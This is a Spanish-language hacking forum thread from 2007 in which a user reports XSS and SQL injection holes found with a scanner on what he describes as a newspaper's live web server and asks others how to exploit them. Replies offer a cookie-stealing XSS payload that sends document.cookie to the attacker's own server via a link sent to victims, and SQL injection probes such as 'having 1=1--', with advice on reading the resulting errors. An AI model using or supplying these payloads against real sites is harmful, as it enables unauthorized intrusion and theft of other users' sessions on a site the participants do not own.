elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  xss encontrado en web(como sacar provecho?)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: xss encontrado en web(como sacar provecho?)  (Leído 7,438 veces)
Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
xss encontrado en web(como sacar provecho?)
« en: 17 Julio 2007, 22:03 pm »

hola eh encontrado la siguiente falla en una web y tal vez esta web sirva como ejemplo para poder explicar la explotacion de un bug de alta importancia,para asi poder aprender de forma practica, asi q espero coolaboracion para que los q realmente saben y si no les molesta instruyan de su conocimiento a un monton de newbies igualmente desde ya se agredece su colaboracion.
bug:con acunetix aparece el mensaje de 11 xss en el index.php
Attack details
The GET variable nuevo_ano has been set to >"><ScRiPt%20%0a%0d>alert(1981921819)%3B</ScRiPt>.
espero su ayuda y conocimiento para liberar la informacion jej salu25
En línea


Encuentros por Video y Chat !!
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #1 en: 18 Julio 2007, 00:29 am »

Pues ahí te dice donde esta la vuln [...]

Busca mas abajo del foro (creo que en documentacion) sobre 'los poderes secretos de XSS' escrito por SDC y las dudas que tengas ya se vera la respuesta ;)
En línea

wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #2 en: 20 Julio 2007, 01:15 am »

Que tipo de web es??, tienes algun usuario en esa web,
Algo muy util es robarte es el robo de cookies, osea hacr algo como document.location="tuserver/robacokies.php?cookie="document.cookie t hacer que otro usuario entre al link

Los usos son bastantes, pero todo depende de la pagina con el bug
Saludos
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #3 en: 20 Julio 2007, 04:34 am »


si fuese un foro, un banco o un lugar donde esten registrados users, seria interesante explotar el XSS, aunque hay otras tecnicas interesantes como el documento que saco sdc para explotar dichos bugs.

-berz3k.

En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #4 en: 20 Julio 2007, 16:20 pm »

gracias por interesarse en ayudarme, ya estuve siguiendo los consejos y me adentre en el tema, el bug pertenece al servidor de un diario corriendo un Microsoft-iis/5.0 el cual posee unas 26 vulnerabilidades de xss y 5 de sql injection.
Lo que estudie a fondo fue el tema del xss pero logre descubrir que se trata de un xss ocal,es decir que el script no llega al servidor sino que solo se injecta codigo en el navegador lo que seria util pero solo si se mandara el link maliciosamente modificado a un usuario para ejecutar codigo. pero como dije antes ,no es posible una injeccion del tipo 2 en el formulario del servidor.
Tembien tiene WebDav activado,
y la vulnerabilidad en sql afecta a http://www.vulnerable.com:80/search.asp?bqd=111-222-1933email@address.com&oper='
 uds. diganme que les parece. salud25 y otra vez GRacias
En línea


Encuentros por Video y Chat !!
wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #5 en: 20 Julio 2007, 17:18 pm »

Esa vulnerabilidad de sql injection que dices esta mucho mas interesante, que tal mandas el tipo de error que regresa para ver en que se te puede ayudar, por lo prondo puedes intentar enviar: oper='having 1=1-- o sin la comilla oper=5 having 1=1--, si te devuelve algo como: 'tabla.columna' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause., puedes hacer muchas cosas interesantes

SAludos
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #6 en: 20 Julio 2007, 17:52 pm »

la respuesta q devuelve es

                    Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

                    El controlador ODBC no admite las propiedades solicitadas.

                    /search.asp, line 106
En línea


Encuentros por Video y Chat !!
wizache

Desconectado Desconectado

Mensajes: 143


El que poco sabe poco vive


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #7 en: 20 Julio 2007, 17:56 pm »

mm. ese error es nuevo para mi, siempre te regresa el error?, o en que casos, otra pregunta, el tipo de valor que toma "oper" por defecto cual es? una cadena o un entero
En línea

Tengu


Desconectado Desconectado

Mensajes: 330


2+1 = 1 , despues de todo , tdo es relativo


Ver Perfil WWW
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #8 en: 20 Julio 2007, 19:26 pm »

si9 alguien logra saber a que se debe este error porfavor haganmelo saber jej
En línea


Encuentros por Video y Chat !!
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: xss encontrado en web(como sacar provecho?)
« Respuesta #9 en: 25 Julio 2007, 00:21 am »

la respuesta q devuelve es

                    Microsoft OLE DB Provider for ODBC Drivers error '80040e21'

                    El controlador ODBC no admite las propiedades solicitadas.

                    /search.asp, line 106


Ese error se debe a que la sintaxis de la consulta es incorrecta, prueba a reconstruirla de nuevo siguiendo los consejos que te dió wizache.
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
El Estado islámico lanza una campaña en las redes para sacar provecho de la ...
Noticias
wolfbcn 0 1,416 Último mensaje 14 Enero 2015, 21:08 pm
por wolfbcn
¿Se le puede sacar provecho a este ordenador con alguna distro linux?
GNU/Linux
AtariRulz 6 3,809 Último mensaje 29 Diciembre 2015, 03:17 am
por crack81
Encontrado bug en linux, como proceder?
GNU/Linux
Hason 0 1,854 Último mensaje 6 Septiembre 2016, 14:31 pm
por Hason
Cómo sacar provecho de lo aprendido
Dudas Generales
Ancasu 5 4,251 Último mensaje 10 Diciembre 2016, 04:28 am
por PalitroqueZ
¿Que provecho se le puede sacar a una Botnet?
Análisis y Diseño de Malware
tutululu 6 3,546 Último mensaje 22 Noviembre 2018, 00:38 am
por AlbertoBSD
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines